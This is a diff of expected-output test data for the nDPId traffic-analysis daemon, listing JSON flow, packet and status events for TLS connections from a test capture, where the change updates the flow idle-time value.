-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623221441880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623221441880,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA0opVAAEAGGa\/AqAH6XHpfY6OWAbs7TQBbgC6IS4AQAKwLVQAAAQEICqp14Xweqlgs"} -00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221441867,"flow_last_seen":1623221441893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623221441893,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623221441867,"flow_last_seen":1623221441911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623221441911,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1623221442073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221441867,"flow_last_seen":1623221441867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221441867,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623221441867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441867,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8opRAAEAGGajAqAH6XHpfY6OWAbs7TQBaAAAAAKAC\/\/9coQAAAgQFtAQCCAqqdeFuAAAAAAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623221441879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441879,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA8AABAADgGxDxcel9jwKgB+gG7o5aALohKO00AW6AS\/ojeuQAAAgQFtAQCCAoeqlgsqnXhbgEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623221441880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623221441880,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA0opVAAEAGGa\/AqAH6XHpfY6OWAbs7TQBbgC6IS4AQAKwLVQAAAQEICqp14Xweqlgs"} +00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221441867,"flow_last_seen":1623221441893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623221441893,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623221441867,"flow_last_seen":1623221441911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623221441911,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1623221442073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":36,"packets-processed":35,"total-skipped-flows":0,"total-l4-data-len":9095,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1623222051753} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222051753,"flow_last_seen":1623222051753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222051753,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222051753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051753,"pkt":"pJGxgjQ56CrqthSFCABFAAA0YDdAAIAGW9bAqAHjNElH4sOXAbv6yL58AAAAAIAC+vC20AAAAgQFtAEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222051852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051852,"pkt":"6CrqthSFpJGxgjQ5CABFAAA0AABAAOkGUw00SUfiwKgB4wG7w5czz+y6+si+fYASaQMoIwAAAgQFtAEBBAIBAwMI"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222051853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623222051853,"pkt":"pJGxgjQ56CrqthSFCABFAAAoYDhAAIAGW+HAqAHjNElH4sOXAbv6yL59M8\/su1AQAgHP+AAAAAAAAAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222051753,"flow_last_seen":1623222051854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623222051854,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01192{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5798,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","server_names":"*.presence.fuze.com,presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=*.presence.fuze.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"B4:E1:85:91:CD:36:0A:89:7B:6F:A0:C1:11:B5:A5:29:CE:05:13:79"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":60,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623221441867,"flow_last_seen":1623221458497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8498,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1623222052202,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222051753,"flow_last_seen":1623222051753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222051753,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222051753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051753,"pkt":"pJGxgjQ56CrqthSFCABFAAA0YDdAAIAGW9bAqAHjNElH4sOXAbv6yL58AAAAAIAC+vC20AAAAgQFtAEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222051852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051852,"pkt":"6CrqthSFpJGxgjQ5CABFAAA0AABAAOkGUw00SUfiwKgB4wG7w5czz+y6+si+fYASaQMoIwAAAgQFtAEBBAIBAwMI"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222051853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623222051853,"pkt":"pJGxgjQ56CrqthSFCABFAAAoYDhAAIAGW+HAqAHjNElH4sOXAbv6yL59M8\/su1AQAgHP+AAAAAAAAAAA"} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222051753,"flow_last_seen":1623222051854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623222051854,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01192{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5798,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","server_names":"*.presence.fuze.com,presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=*.presence.fuze.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"B4:E1:85:91:CD:36:0A:89:7B:6F:A0:C1:11:B5:A5:29:CE:05:13:79"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":60,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623221441867,"flow_last_seen":1623221458497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8498,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1623222052202,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":67,"packets-processed":66,"total-skipped-flows":0,"total-l4-data-len":17875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":1623223595952} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223595952,"flow_last_seen":1623223595952,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223595952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223595952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZBhAAEAGCeXAqAGAW8au0MW8AbvaIBcHAAAAAKAC+vC78AAAAgQFtAQCCAq86k7VAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223595999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595999,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfP1bxq7QwKgBgAG7xbxrNtsg2iAXCKASqbDzDgAAAgQFnAQCCAoXn7wwvOpO1QEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223596002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623223596002,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0ZBlAAEAGCezAqAGAW8au0MW8AbvaIBcIazbbIYAQAfbJTQAAAQEICrzqTwcXn7ww"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223595952,"flow_last_seen":1623223596004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623223596004,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623223595952,"flow_last_seen":1623223596052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623223596052,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":107,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623222051753,"flow_last_seen":1623222112185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8780,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1623223596203,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223595952,"flow_last_seen":1623223595952,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223595952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223595952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZBhAAEAGCeXAqAGAW8au0MW8AbvaIBcHAAAAAKAC+vC78AAAAgQFtAQCCAq86k7VAAAAAAEDAwc="} 